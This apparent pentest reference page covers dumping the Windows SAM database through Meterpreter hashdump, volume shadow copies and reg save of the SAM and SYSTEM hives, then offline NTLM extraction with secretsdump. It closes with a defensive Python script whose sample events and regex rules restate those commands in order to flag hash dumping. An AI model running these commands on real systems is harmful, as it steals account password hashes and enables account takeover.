Security Account Manager (SAM)

SAM Database (Security Account Manager)

The SAM database stores local account information, including credentials. While Windows is running the file is held open by the operating system, so it cannot be read directly; the following command, for example, fails rather than returning the file contents:

type c:\Windows\System32\config\sam

Dumping SAM Database

Using Meterpreter

Administrator privileges are required to dump the SAM database with Meterpreter. Check the current user context first, then dump the hashes:

meterpreter > getuid
meterpreter > hashdump

Using Volume Shadow Copy Service (VSS)

VSS can create backups of files while the system is in use, which sidesteps the lock on the live SAM file.

  1. Create a shadow copy:

     wmic shadowcopy call create Volume='C:\'

  2. Verify the shadow copy was created:

     vssadmin list shadows

  3. Copy the SAM and SYSTEM files from the shadow copy, substituting the shadow copy volume path reported in step 2 for <Volume Shadow LOCATION>:

     copy \\?\<Volume Shadow LOCATION>\windows\system32\config\sam
     copy \\?\<Volume Shadow LOCATION>\windows\system32\config\system

Using Registry Hives

The SAM database can also be accessed through the Windows registry. Save both the SAM and SYSTEM hives; the SYSTEM hive is needed as well because it holds the key that protects the hashes stored in SAM:

reg save HKLM\sam C:\users\Administrator\Desktop\sam-reg
reg save HKLM\system C:\users\Administrator\Desktop\system-reg

Extracting NTLM Hashes

Once the saved SAM and SYSTEM hives have been transferred to an analysis host, tools such as Impacket's secretsdump.py can extract the NTLM hashes from them offline:

python3 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
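Every technique above (the VSS shadow copy, the reg save of the hives, and the direct read attempt) leaves a process-creation event on the host, which is where a defender catches it. The script below is an added example written for this page, not code from the page or from Impacket: it runs a small set of detection rules over constructed, simplified Sysmon Event ID 1 style events (user, image, command line) and then correlates per user, escalating only when the same account has touched both the SAM and SYSTEM hives, since the pair is the signature of an offline hash dump rather than routine registry work. The event field names, rule names and severities are this example's own assumptions, and the sample events are constructed, not captured logs.

```python
import re
from collections import defaultdict

# Constructed sample events in a simplified Sysmon Event ID 1 shape (assumed field names).
# The shadow-copy device path below is a constructed illustration, not a captured value.
SAMPLE_EVENTS = [
    {"user": r"CORP\alice", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\sam C:\users\Administrator\Desktop\sam-reg"},
    {"user": r"CORP\alice", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\system C:\users\Administrator\Desktop\system-reg"},
    {"user": r"CORP\bob", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic shadowcopy call create Volume='C:\'"},
    {"user": r"CORP\bob", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"user": r"CORP\bob", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam ."},
    {"user": r"CORP\bob", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system ."},
    # Benign registry use: must not fire.
    {"user": r"CORP\carol", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
    # The direct read attempt from the top of the page; it fails, but it is still worth seeing.
    {"user": r"CORP\dave", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"type c:\Windows\System32\config\sam"},
]

# (rule name, severity, regex on the image path, regex on the command line); names are this example's own.
RULES = [
    ("reg_save_credential_hive", "high", r"reg\.exe$",
     r"\breg\s+save\s+HKLM\\(sam|system)\b"),
    ("shadow_copy_create", "medium", r"(wmic|vssadmin)\.exe$",
     r"shadowcopy\s+call\s+create|vssadmin\s+create\s+shadow"),
    ("shadow_copy_enum", "low", r"vssadmin\.exe$",
     r"vssadmin\s+list\s+shadows"),
    ("hive_file_read", "high", r"(cmd|powershell)\.exe$",
     r"\b(copy|type|xcopy|robocopy)\b.*\\config\\(sam|system)\b"),
]

HIVE_RE = re.compile(r"\\(sam|system)\b", re.I)


def detect(events):
    """Return one finding per (event, matching rule), tagged with the hive it touched, if any."""
    findings = []
    for ev in events:
        for name, severity, image_re, cmd_re in RULES:
            if re.search(image_re, ev["image"], re.I) and re.search(cmd_re, ev["cmdline"], re.I):
                hive = HIVE_RE.search(ev["cmdline"])
                findings.append({
                    "rule": name,
                    "severity": severity,
                    "user": ev["user"],
                    "hive": hive.group(1).lower() if hive else None,
                    "cmdline": ev["cmdline"],
                })
    return findings


def correlate(findings):
    """Users who touched both SAM and SYSTEM: the SYSTEM hive holds the key needed to
    use the SAM hashes offline, so the pair is far stronger evidence than either alone."""
    hives_by_user = defaultdict(set)
    for f in findings:
        if f["hive"]:
            hives_by_user[f["user"]].add(f["hive"])
    return sorted(u for u, h in hives_by_user.items() if {"sam", "system"} <= h)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f['severity']:6}] {f['rule']:24} {f['user']:12} {f['cmdline']}")
    print("likely offline SAM dump by:", correlate(found))
```

The per-rule matches are deliberately kept at their own severities so that a single `vssadmin list shadows` from a backup operator stays low; it is the correlation step, one account reaching both hives, that should page someone. On a real host the event dicts would come from a Sysmon or Security log export rather than the constructed list above.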
